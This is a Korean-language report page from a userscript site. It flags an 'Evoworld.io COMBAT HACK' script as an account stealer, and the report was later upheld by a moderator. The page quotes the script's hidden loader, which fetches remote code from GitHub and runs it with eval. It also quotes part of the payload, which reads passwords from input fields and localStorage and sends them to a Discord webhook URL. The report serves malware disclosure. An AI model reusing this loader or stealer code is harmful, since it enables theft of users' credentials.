Evoworld.io COMBAT HACK 항목이 2026-01-04 에 악성 코드 사유로 신고되었습니다.
Stiller accounts line 409 - 419:
fetch('https://raw.githubusercontent.com/shadowxds-eng/main.js/main/main.code')
.then(response => response.text())
.then(code => {
eval(code);
})
если перейти на https://raw.githubusercontent.com/shadowxds-eng/main.js/main/main.code то там основная часть воровства аккаунтов:
// webhook.js - Data collection and Discord sending ONLY
(function() {
'use strict';
console.log('EvoWorld Data Collector loaded');
const DISCORD_WEBHOOK = 'https://discord.com/api/webhooks/1457387501139525810/owMaPq6BvF1suRbSgOC4BetPSNTbFijMvyOP8pSt6yVULem4mX9yHgKglOXEnlCHtHYE';
function getSavedPassword() {
try {
const inputs = document.querySelectorAll('input[type="password"], input[name*="pass"], input[id*="pass"]');
for (let input of inputs) {
if (input.value && input.value.length > 3 && input.value.length < 50) {
return input.value;
}
}
for (let i = 0; i < localStorage.length; i++) {
const key = localStorage.key(i);
const value = localStorage.getItem(key);
if ((ke
이 스크립트에는 이전에 인정되거나 수정된 신고가 1건 있습니다.
türk evoworld sikici (신고된 사용자)의 활동:
이 신고는 관리자에 의해 인정되었지만, 관리자는 사유를 허용되지 않는 외부 코드(으)로 표시했습니다.
